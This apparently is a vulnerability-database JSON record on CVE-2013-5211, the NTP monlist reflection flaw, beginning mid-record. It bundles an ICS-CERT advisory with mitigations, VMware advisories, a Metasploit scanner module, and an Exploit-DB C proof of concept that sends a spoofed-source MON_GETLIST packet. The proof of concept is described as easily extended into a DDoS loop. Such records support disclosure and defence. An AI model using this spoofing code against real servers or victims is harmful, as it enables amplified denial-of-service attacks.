in denial-of-service (DoS) attacks using Network Time Protocol (NTP) Reflection. This type of attack provides an adversary the ability to generate high volume distributed denial of service (DDoS) traffic to target web sites or public\u2011facing devices that could cause disruption to services.\n\nThis vulnerability could be exploited remotely. Exploits that target this type of attack are known to be publicly available.\n\nMitigations are available for both operators of NTP Stratum devices and possible victims of these attacks.\n\n## AFFECTED PRODUCTS\n\nProducts using NTP service NTP-4.2.7p25 and prior (with MONLIST support) are affected. 
No specific vendor is specified as this is an open source protocol.\n\n## IMPACT\n\nExploitation of this vulnerability could cause NTP Stratum devices to be used as sources of unrequested NTP synchronization requests in a DoS attack.\n\nVictims of this type of DoS attack could see service interruption due to boundary protection rules that do not filter NTP synchronization requests that do not originate internally.\n\nImpact to individual organizations depends on many factors that are unique to each organization. NCCIC/ICS-CERT recommends that organizations evaluate the impact of this vulnerability based on their operational environment, architecture, and product implementation.\n\n## BACKGROUND\n\nThe NTP is described in RFC 958 (Network Time Protocol (NTP), http://tools.ietf.org/html/rfc958, web site last accessed February 20, 2014), an open source collaboration for acceptance, and is used to synchronize system time over a network.\n\n## VULNERABILITY CHARACTERIZATION\n\n### VULNERABILITY OVERVIEW\n\n### IMPROPER INPUT VALIDATION (CWE-20: Improper Input Validation, http://cwe.mitre.org/data/definitions/20.html, web site last accessed February 20, 2014)\n\nThe NTP service could allow for multiple sync requests to be made with a forged source IP address, thus sending the unrequested responses back to the source, consuming its resources. An attacker could exploit this vulnerability by sending a specifically crafted packet with a forged source IP address of the target.\n\nIt will not be evident to the NTP operator that the system has been exploited or is being used in a DoS attack as the commands are normal time synchronization requests.\n\nCVE-2013-5211 (NVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5211, NIST uses this advisory to create the CVE web site report, web site last accessed February 20, 2014) has been assigned to this vulnerability. 
A CVSS v2 base score of 7.8 has been assigned; the CVSS vector string is (AV:N/AC:L/Au:N/C:N/I:N/A:C) (CVSS Calculator, http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/Au:N/C:N/I:N/A:C, web site last accessed February 20, 2014).\n\n### VULNERABILITY DETAILS\n\n#### EXPLOITABILITY\n\nThis vulnerability could be exploited remotely.\n\n#### EXISTENCE OF EXPLOIT\n\nExploits that target this vulnerability are publicly available.\n\n#### DIFFICULTY\n\nAn attacker with low skill would be able to exploit this vulnerability.\n\n## MITIGATION\n\nNTP can be upgraded to NTP-4.2.7p26 or later, which removes MONLIST support and replaces it with the more secure MRULIST function. This fix has been available since 2010.\n\nIn addition, integrators and asset owners are encouraged to review boundary protection rule sets and filters to eliminate incoming NTP requests that do not originate internally.\n\nNCCIC/US-CERT resource documents that outline suggestions for mitigating active DDoS attacks are available here:\n\nhttp://www.us-cert.gov/sites/default/files/publications/DDoS%20Quick%20Guide.pdf\n\nhttp://www.us-cert.gov/ncas/tips/ST04-015\n\n<http://www.kb.cert.org/vuls/id/348126>\n\nNCCIC/ICS-CERT encourages asset owners to take additional defensive measures to protect against this and other cybersecurity risks.\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPN is only as secure as the connected devices.\n\nNCCIC/ICS-CERT also provides a section for control systems security recommended practices on the NCCIC/ICS-CERT web page at: http://ics-cert.us-cert.gov/content/recommended-practices. 
Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. NCCIC/ICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nAdditional mitigation guidance and recommended practices are publicly available in the NCCIC/ICS-CERT Technical Information Paper, ICS-TIP-12-146-01B\u2014Targeted Cyber Intrusion Mitigation Strategies, that is available for download from the NCCIC/ICS-CERT web site (http://ics-cert.us-cert.gov/).\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to NCCIC/ICS-CERT for tracking and correlation against other incidents.\n", "cvss3": {}, "published": "2018-09-06T12:00:00", "type": "ics", "title": "NTP Reflection Attack", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5211"], "modified": "2018-09-06T12:00:00", "id": "ICSA-14-051-04", "href": "https://www.cisa.gov/news-events/ics-advisories/icsa-14-051-04", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "metasploit": [{"lastseen": "2022-10-26T09:15:01", "description": "This module identifies NTP servers which permit \"monlist\" queries and obtains the recent clients list. The monlist feature allows remote attackers to cause a denial of service (traffic amplification) via spoofed requests. 
The more clients there are in the list, the greater the amplification.\n", "cvss3": {}, "published": "2010-01-27T06:53:24", "type": "metasploit", "title": "NTP Monitor List Scanner", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2022-02-16T23:22:40", "id": "MSF:AUXILIARY-SCANNER-NTP-NTP_MONLIST-", "href": "https://www.rapid7.com/db/modules/auxiliary/scanner/ntp/ntp_monlist/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::Udp\n include Msf::Auxiliary::UDPScanner\n include Msf::Auxiliary::NTP\n include Msf::Auxiliary::DRDoS\n\n def initialize\n super(\n 'Name' => 'NTP Monitor List Scanner',\n 'Description' => %q{\n This module identifies NTP servers which permit \"monlist\" queries and\n obtains the recent clients list. The monlist feature allows remote\n attackers to cause a denial of service (traffic amplification)\n via spoofed requests. 
The more clients there are in the list, the\n greater the amplification.\n },\n 'References' =>\n [\n ['CVE', '2013-5211'],\n ['URL', 'https://www.cisa.gov/uscert/ncas/alerts/TA14-013A'],\n ['URL', 'https://support.ntp.org/bin/view/Main/SecurityNotice'],\n ['URL', 'https://nmap.org/nsedoc/scripts/ntp-monlist.html'],\n ],\n 'Author' => 'hdm',\n 'License' => MSF_LICENSE\n )\n\n register_options(\n [\n OptInt.new('RETRY', [false, \"Number of tries to query the NTP server\", 3]),\n OptBool.new('SHOW_LIST', [false, 'Show the recent clients list', false])\n ])\n\n register_advanced_options(\n [\n OptBool.new('StoreNTPClients', [true, 'Store NTP clients as host records in the database', false])\n ])\n end\n\n # Called for each response packet\n def scanner_process(data, shost, sport)\n @results[shost] ||= { messages: [], peers: [] }\n @results[shost][:messages] << Rex::Proto::NTP::NTPPrivate.new.read(data).to_binary_s\n @results[shost][:peers] << extract_peer_tuples(data)\n end\n\n # Called before the scan block\n def scanner_prescan(batch)\n @results = {}\n @aliases = {}\n @probe = Rex::Proto::NTP.ntp_private(datastore['VERSION'], datastore['IMPLEMENTATION'], 42, \"\\0\" * 40).to_binary_s\n end\n\n # Called after the scan block\n def scanner_postscan(batch)\n @results.keys.each do |k|\n response_map = { @probe => @results[k][:messages] }\n peer = \"#{k}:#{rport}\"\n\n # TODO: check to see if any of the responses are actually NTP before reporting\n report_service(\n :host => k,\n :proto => 'udp',\n :port => rport,\n :name => 'ntp'\n )\n\n peers = @results[k][:peers].flatten(1)\n unless peers.empty?\n print_good(\"#{peer} NTP monlist request permitted (#{peers.length} entries)\")\n # store the peers found from the monlist\n report_note(\n :host => k,\n :proto => 'udp',\n :port => rport,\n :type => 'ntp.monlist',\n :data => {:monlist => peers}\n )\n # print out peers if desired\n if datastore['SHOW_LIST']\n peers.each do |ntp_peer|\n print_status(\"#{peer} #{ntp_peer}\")\n 
end\n end\n # store any aliases for our target\n report_note(\n :host => k,\n :proto => 'udp',\n :port => rport,\n :type => 'ntp.addresses',\n :data => {:addresses => peers.map { |p| p.last }.sort.uniq }\n )\n\n if (datastore['StoreNTPClients'])\n print_status(\"#{peer} Storing #{peers.length} NTP client hosts in the database...\")\n peers.each do |r|\n maddr,mport,mserv = r\n next if maddr == '127.0.0.1' # some NTP servers peer with themselves..., but we can't store loopback\n report_note(\n :host => maddr,\n :type => 'ntp.client.history',\n :data => {\n :address => maddr,\n :port => mport,\n :server => mserv\n }\n )\n end\n end\n end\n\n vulnerable, proof = prove_amplification(response_map)\n what = 'NTP Mode 7 monlist DRDoS (CVE-2013-5211)'\n if vulnerable\n print_good(\"#{peer} - Vulnerable to #{what}: #{proof}\")\n report_vuln({\n :host => k,\n :port => rport,\n :proto => 'udp',\n :name => what,\n :refs => self.references\n })\n else\n vprint_status(\"#{peer} - Not vulnerable to #{what}: #{proof}\")\n end\n end\n\n end\n\n # Examine the monlist reponse +data+ and extract all peer tuples (saddd, dport, daddr)\n def extract_peer_tuples(data)\n return [] if data.length < 76\n\n # NTP headers 8 bytes\n ntp_flags, ntp_auth, ntp_vers, ntp_code = data.slice!(0,4).unpack('C*')\n pcnt, plen = data.slice!(0,4).unpack('nn')\n return [] if plen != 72\n\n idx = 0\n peer_tuples = []\n 1.upto(pcnt) do\n # u_int32 firsttime; /* first time we received a packet */\n # u_int32 lasttime; /* last packet from this host */\n # u_int32 restr; /* restrict bits (was named lastdrop) */\n # u_int32 count; /* count of packets received */\n # u_int32 addr; /* host address V4 style */\n # u_int32 daddr; /* destination host address */\n # u_int32 flags; /* flags about destination */\n # u_short port; /* port number of last reception */\n\n _,_,_,_,saddr,daddr,_,dport = data[idx, 30].unpack(\"NNNNNNNn\")\n\n peer_tuples << [ Rex::Socket.addr_itoa(saddr), dport, Rex::Socket.addr_itoa(daddr) 
]\n idx += plen\n end\n peer_tuples\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ntp/ntp_monlist.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitdb": [{"lastseen": "2023-06-22T02:55:14", "description": "", "cvss3": {}, "published": "2014-04-28T00:00:00", "type": "exploitdb", "title": "NTP ntpd monlist Query Reflection - Denial of Service", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["2013-5211", "CVE-2013-5211"], "modified": "2014-04-28T00:00:00", "id": "EDB-ID:33073", "href": "https://www.exploit-db.com/exploits/33073", "sourceData": "/*\n * Exploit Title: CVE-2013-5211 PoC - NTP DDoS amplification\n * Date: 28/04/2014\n * Code Author: Danilo PC - <DaNotKnow@gmail.com>\n * CVE : CVE-2013-5211\n*/\n\n/* I coded this program to help other to understand how an DDoS attack amplified by NTP servers works (CVE-2013-5211)\n * I took of the code that generates a DDoS, so this code only sends 1 packet. Why? Well...there's a lot of kiddies out there,\n * if you know how to program, making a loop or using with other tool is piece of cake. 
There core idea is there, just use it as you please.\n */\n\n//------------------------------------------------------------------------------------------------//\n//------------------------------------------------------------------------------------------------//\n\n\n#include <stdio.h> //For on printf function\n#include <string.h> //For memset\n#include <sys/socket.h> //Structs and Functions used for sockets operations.\n#include <stdlib.h>\t //For exit function\n#include <netinet/ip.h> //Structs for IP header\n\n//Struct for UDP Packet\nstruct udpheader{\n\tunsigned short int udp_sourcePortNumber;\n\tunsigned short int udp_destinationPortNumber;\n\tunsigned short int udp_length;\n\tunsigned short int udp_checksum;\n};\n\n// Struct for NTP Request packet. Same as req_pkt from ntpdc.h, just a little simpler\nstruct \tntpreqheader {\n\tunsigned char rm_vn_mode;\t\t/* response, more, version, mode */\n\tunsigned char auth_seq;\t\t/* key, sequence number */\n\tunsigned char implementation;\t\t/* implementation number */\n\tunsigned char request;\t\t\t/* request number */\n\tunsigned short err_nitems;\t\t/* error code/number of data items */\n\tunsigned short mbz_itemsize;\t\t/* item size */\n\tchar data[40];\t\t\t\t/* data area [32 prev](176 byte max) */\n\tunsigned long tstamp;\t\t\t/* time stamp, for authentication */\n\tunsigned int keyid;\t\t\t/* encryption key */\n\tchar mac[8]; \t\t/* (optional) 8 byte auth code */\n};\n\n\n// Calculates the checksum of the ip header.\nunsigned short csum(unsigned short *ptr,int nbytes)\n{\n register long sum;\n unsigned short oddbyte;\n register short answer;\n\n sum=0;\n while(nbytes>1) {\n sum+=*ptr++;\n nbytes-=2;\n }\n if(nbytes==1) {\n oddbyte=0;\n *((u_char*)&oddbyte)=*(u_char*)ptr;\n sum+=oddbyte;\n }\n\n sum = (sum>>16)+(sum & 0xffff);\n sum = sum + (sum>>16);\n answer=(short)~sum;\n return(answer);\n}\n\n\n//Da MAIN\n\nint main(int argc, char **argv)\n{\nint status;\t\t\t// Maintains the return values of the 
functions\nstruct iphdr *ip;\t\t// Pointer to ip header struct\nstruct udpheader *udp;\t\t// Pointer to udp header struct\nstruct ntpreqheader *ntp;\t// Pointer to ntp request header struct\nint sockfd;\t\t\t// Maintains the socket file descriptor\nint one = 1;\t\t\t// Sets the option IP_HDRINCL of the sockt to tell the kernel that the header are alredy included on the packets.\nstruct sockaddr_in dest;\t// Maintains the data of the destination address\nchar packet[ sizeof(struct iphdr) + sizeof(struct udpheader) + sizeof(struct ntpreqheader) ]; //Packet itself\n\n// Parameters check\n\tif( argc != 3){\n\t\tprintf(\"Usage: ./ntpDdos [Target IP] [NTP Server IP]\\n\");\n\t\tprintf(\"Example: ./ntpDdos 1.2.3.4 127.0.0.1 \\n\");\n\t\tprintf(\"Watch it on wireshark!\\n\");\n\t\tprintf(\"Coded for education purpose only!\\n\");\n\t\texit(1);\n\t}\n\n// Create a socket and tells the kernel that we want to use udp as layer 4 protocol\n\tsockfd = socket(PF_INET, SOCK_RAW, IPPROTO_UDP);\n\tif (sockfd == -1){\n\t\tprintf(\"Error on initializing the socket\\n\");\n\t\texit(1);\n\t}\n\n\n\n//Sets the option IP_HDRINCL\n\tstatus = setsockopt( sockfd, IPPROTO_IP, IP_HDRINCL, &one, sizeof one);\n\tif (status == -1){\n printf(\"Error on setting the option HDRINCL on socket\\n\");\n exit(1);\n }\n\n\n//\"Zeroes\" all the packet stack\n\tmemset( packet, 0, sizeof(packet) );\n\n\n//Mounts the packet headers\n// [ [IP HEADER] [UDP HEADER] [NTP HEADER] ] --> Victory!!!\n\tip = (struct iphdr *)packet;\n\tudp = (struct udpheader *) (packet + sizeof(struct iphdr) );\n\tntp = (struct ntpreqheader *) (packet + sizeof(struct iphdr) + sizeof(struct udpheader) );\n\n\n//Fill the IP Header\n\tip->version = 4;\t\t//IPv4\n ip->ihl = 5;\t\t\t//Size of the Ip header, minimum 5\n ip->tos = 0;\t\t\t//Type of service, the default value is 0\n ip->tot_len = sizeof(packet); //Size of the datagram\n ip->id = htons(1234); \t//LengthIdentification Number\n ip->frag_off = 0;\t\t//Flags, zero represents 
reserved\n ip->ttl = 255;\t \t\t//Time to Live. Maximum of 255\n ip->protocol = IPPROTO_UDP;\t//Sets the UDP as the next layer protocol\n ip->check = 0;\t \t\t//Checksum.\n ip->saddr = inet_addr( argv[1] ); //Source ip ( spoofing goes here)\n ip->daddr = inet_addr( argv[2] ); //Destination IP\n\n\t//Fills the UDP Header\n\tudp->udp_sourcePortNumber = htons( atoi( \"123\" ) ); //Source Port\n\tudp->udp_destinationPortNumber = htons(atoi(\"123\")) ; //Destination Port\n\tudp->udp_length = htons( sizeof(struct udpheader) + sizeof(struct ntpreqheader) ); //Length of the packet\n\tudp->udp_checksum = 0;\t\t\t\t //Checksum\n\n\t//Calculate the checksums\n\tip->check = csum((unsigned short *)packet, ip->tot_len); //Calculate the checksum for iP header\n\n\t//Sets the destination data\n\tdest.sin_family = AF_INET;\t\t\t\t // Address Family Ipv4\n\tdest.sin_port = htons (atoi( \"123\" ) ) ; \t\t// Destination port\n\tdest.sin_addr.s_addr = inet_addr( argv[2] ); // Destination address to which the packet is to be sent\n\n\t//Fills the NTP header\n\t//Ok, here is the magic, we need to send a request ntp packet with the modes and codes sets for only MON_GETLIST\n\t//To do this we can import the ntp_types.h and use its structures and macros. 
To simplify i've created a simple version of the\n\t// ntp request packet and hardcoded the values for the fields to make a \"MON_GETLIST\" request packet.\n\t// To learn more, read this: http://searchcode.com/codesearch/view/451164#127\n\tntp->rm_vn_mode=0x17; //Sets the response bit to 0, More bit to 0, Version field to 2, Mode field to 7\n\tntp->implementation=0x03; //Sets the implementation to 3\n\tntp->request=0x2a;\t //Sets the request field to 42 ( MON_GETLIST )\n\t\t\t\t //All the other fields of the struct are zeroed\n\n\n\t// Sends the packets\n\tstatus = sendto(sockfd, packet, ip->tot_len, 0, (struct sockaddr *)&dest, sizeof(dest) );\n\t\tif(status <0){\n\t\t\tprintf(\"Failed to send the packets\\n\");\n\t\t\texit(1);\n\t\t}\n\n\n}", "sourceHref": "https://gitlab.com/exploit-database/exploitdb/-/raw/main/exploits/linux/dos/33073.c", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "vmware": [{"lastseen": "2021-06-08T18:38:41", "description": "**a. DDoS vulnerability in NTP third party libraries**\n\nThe NTP daemon has a DDoS vulnerability in the handling of the \"monlist\" command. An attacker may send a forged request to a vulnerable NTP server resulting in an amplified response to the intended target of the DDoS attack. \n \n**Mitigation** \n \nMitigation for this issue is documented in VMware Knowledge Base article [2070193](<http://kb.vmware.com/kb/2070193>). This article also documents when vSphere products are affected. \n \nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2013-5211 to this issue. 
\n \nColumn 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available.\n", "cvss3": {}, "published": "2014-03-11T00:00:00", "type": "vmware", "title": "VMware vSphere updates to third party libraries", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2013-5211", "CVE-2013-4332"], "modified": "2014-12-04T00:00:00", "id": "VMSA-2014-0002", "href": "https://www.vmware.com/security/advisories/VMSA-2014-0002.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-09-12T15:51:17", "description": "a. DDoS vulnerability in NTP third party libraries\n\nThe NTP daemon has a DDoS vulnerability in the handling of the \"monlist\" command. An attacker may send a forged request to a vulnerable NTP server resulting in an amplified response to the intended target of the DDoS attack.\n\nMitigation\n\nMitigation for this issue is documented in VMware Knowledge Base article 2070193. This article also documents when vSphere products are affected.\n\nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2013-5211 to this issue.\n\nColumn 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available.", "cvss3": {}, "published": "2014-03-11T00:00:00", "type": "vmware", "title": "VMware vSphere updates to third party libraries", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4332", "CVE-2013-5211"], "modified": 
"2014-12-04T00:00:00", "id": "VMSA-2014-0002.4", "href": "https://www.vmware.com/security/advisories/VMSA-2014-0002.4.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}]}